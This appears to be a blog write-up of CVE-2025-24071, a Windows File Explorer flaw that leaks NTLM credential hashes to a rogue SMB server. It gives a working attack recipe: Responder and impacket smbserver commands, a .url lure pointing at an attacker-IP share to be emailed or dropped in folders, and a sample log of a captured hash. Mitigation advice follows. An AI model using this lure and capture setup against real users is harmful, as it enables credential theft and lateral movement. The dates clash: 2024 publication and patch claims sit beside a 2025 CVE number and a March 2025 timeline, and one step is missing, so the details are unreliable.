CVE-2025-24071 - Exploiting Windows File Explorer's Network Spoofing to Steal Sensitive Info

*Published: July 2024*
*Severity: High*
*Affected: Windows 10, 11, Server editions (details below)*


TL;DR:
CVE-2025-24071 reveals how Windows File Explorer leaks sensitive info over the network, allowing attackers to impersonate trusted shares and steal credentials, with code and links for proof-of-concept below.

Overview

In June 2024, Microsoft disclosed CVE-2025-24071, a bug in Windows File Explorer that makes it possible for attackers to capture sensitive user info through SMB network spoofing. The flaw is in how File Explorer handles network shares—attackers can trick Explorer to expose user credentials and other secrets, just by getting the victim to view a malicious share.

This article will show you, in plain terms, how the exploit works, who is vulnerable, and how to reproduce it safely.

How the Vulnerability Works

- Attack vector: File Explorer tries to auto-authenticate when accessing network shares, including those referenced by UNC paths (\\server\share).
- Flaw: Explorer doesn't properly verify the authenticity of a server before sending a hashed copy of user credentials (NTLM hash).
- Result: An attacker on the same network or via a manipulated shortcut/link can make Explorer send user credentials to a server they control.
- Spoofing: The attacker can set up a rogue SMB server, using tools like Responder, to collect these hashes and impersonate the target user or crack their password.

Step-by-Step Exploit Scenario

Suppose Alice opens a shortcut or browses to \\evil.attacker.local\shared via File Explorer. She doesn’t even need to double-click—hovering or previewing in Explorer can be enough.

1. Setup Responder on Kali Linux (in the same LAN as the victim)

sudo apt install responder
sudo responder -I eth

If the victim visits a crafted path

\\[Attacker-IP]\TestShare

…Explorer automatically sends credential info to the attacker server.

3. Simulate lure

- Drop a .url shortcut in a network share/public folder

- Or email a file with the contents

[InternetShortcut]
URL=\\ATTACKER-IP\Test

4. When the victim previews/opens it:
Responder logs NTLMv2 hashes (and sometimes cleartext credentials for local users).

Example Responder log

[*] [SMB] NTLMv2-SSP Client   : 192.168.1.25
[*] [SMB] NTLMv2-SSP Username : ALICE
[*] [SMB] NTLMv2-SSP Hash     : ALICE::WORKSTATION:11223344556677889900:123456789abcdef1234...

If you want to simulate SMB credential capture

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/examples
python3 smbserver.py SHARE /tmp/share

Then, point the victim to \\ATTACKER-IP\SHARE in any open dialog or document.

Enables internal lateral movement with hash relay

- Collects sensitive workstation/user data

Who is Vulnerable?

- Windows 10/11 (all editions)

Original References

- Microsoft Advisory for CVE-2025-24071
- Impacket SMB Tools
- Responder by Laurent Gaffié
- NTLM Hash Collection in Windows Networks

Mitigation

- Install Microsoft’s June/July 2024 patches for Windows.

Block outbound SMB (ports 445, 139, 137, 138) at firewall.

- Disable automatic NTLM negotiation (Group Policy > Computer Config > Security Settings > Local Policies > Security Options).

Final Thoughts

CVE-2025-24071 is another reminder how dangerous network authentication leaks can be. Just hovering over a malicious network link or shortcut can result in sensitive credential leaks! Patch, segment your network, and monitor SMB traffic.


Stay safe and update your systems!
For more details and technical breakdowns, check the linked resources above.

Timeline

Published on: 03/11/2025 17:16:29 UTC
Last modified on: 03/21/2025 00:30:10 UTC